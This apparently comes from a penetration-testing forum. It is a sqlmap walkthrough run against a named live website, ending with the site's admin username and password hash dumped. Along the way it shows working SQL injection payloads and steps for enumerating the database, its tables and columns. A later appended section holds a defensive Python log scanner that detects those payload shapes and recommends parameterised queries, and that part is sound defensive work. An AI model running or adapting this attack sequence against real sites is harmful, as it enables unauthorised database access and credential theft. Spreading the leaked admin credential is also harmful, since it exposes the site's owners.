China Network Penetration Testing Alliance

Title: sqlmap example: injecting MySQL

Author: admin    Time: 2013-4-4 22:18
Title: sqlmap example: injecting MySQL
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
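From the defender's side, the most useful thing in this transcript is the set of four payload shapes sqlmap reports against the id parameter (a boolean tautology, the FLOOR(RAND(0)*2) ... GROUP BY error-based probe, a UNION ALL SELECT NULL,... column-count probe, and SLEEP(n)). The following is an added example, not part of the original post and not sqlmap's own code: a small Python scanner that URL-decodes each query-string parameter in Common Log Format access-log lines, matches it against signatures derived from those four payloads, and summarises distinct techniques per client, since one address trying all four within seconds is the fingerprint of an automated tool rather than a stray typo. The log lines, the client addresses and the function names are constructed for the example.

```python
from __future__ import annotations
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One regex per technique sqlmap reported against the 'id' parameter above.
# Each is matched case-insensitively against the URL-decoded parameter value.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),      # e.g. AND 799=799
    "error-based":   re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I),
    "union":         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-blind":    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

# Apache/nginx Common Log Format (the constructed sample entries below use it).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

def classify_query(value: str) -> list[str]:
    """Names of every signature that matches one URL-decoded parameter value."""
    decoded = unquote_plus(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines) -> list[dict]:
    """One finding per (request, parameter) whose value matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        path, _, query = m.group("target").partition("?")
        # Split on '&' before decoding, so an encoded '&' (%26) inside a value
        # cannot hide a payload by pretending to start a second parameter.
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            hits = classify_query(value)
            if hits:
                findings.append({
                    "client": m.group("client"), "time": m.group("time"),
                    "path": path, "parameter": name, "techniques": hits,
                })
    return findings

def summarize(findings) -> dict[str, list[str]]:
    """Distinct techniques seen per client address, sorted for stable output."""
    per_client = defaultdict(set)
    for f in findings:
        per_client[f["client"]].update(f["techniques"])
    return {client: sorted(techs) for client, techs in per_client.items()}

# Constructed sample log: the four sqlmap payloads from the post, percent-encoded
# the way Apache records them, plus two ordinary requests. 203.0.113.7 and
# 198.51.100.20 are documentation-range placeholder addresses.
T = "[04/Apr/2013:16:53:54 +0800]"
SAMPLE_LOG = [
    f'198.51.100.20 - - {T} "GET /article.php?id=277&page=2 HTTP/1.1" 200 4990',
    f'203.0.113.7 - - {T} "GET /article.php?id=276 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {T} "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {T} "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),'
    'CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),'
    'CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 5288',
    f'203.0.113.7 - - {T} "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,'
    'CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),'
    'CHAR(58,110,99,118,58)),%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 5170',
    f'203.0.113.7 - - {T} "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["path"], f["parameter"], ",".join(f["techniques"]))
    print(summarize(scan_log(SAMPLE_LOG)))
```

Run as-is it reports four findings, all on the id parameter of /article.php from the same client, and the summary lists all four techniques for that address. Signature matching of this kind is a detection aid, not a fix: the transcript shows the application accepting id unchanged into its query, and the durable remedy is a parameterised query on the server side; note also that the page above returns HTTP 200 for every probe, so status-code alerting alone would see nothing.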




Welcome to the China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2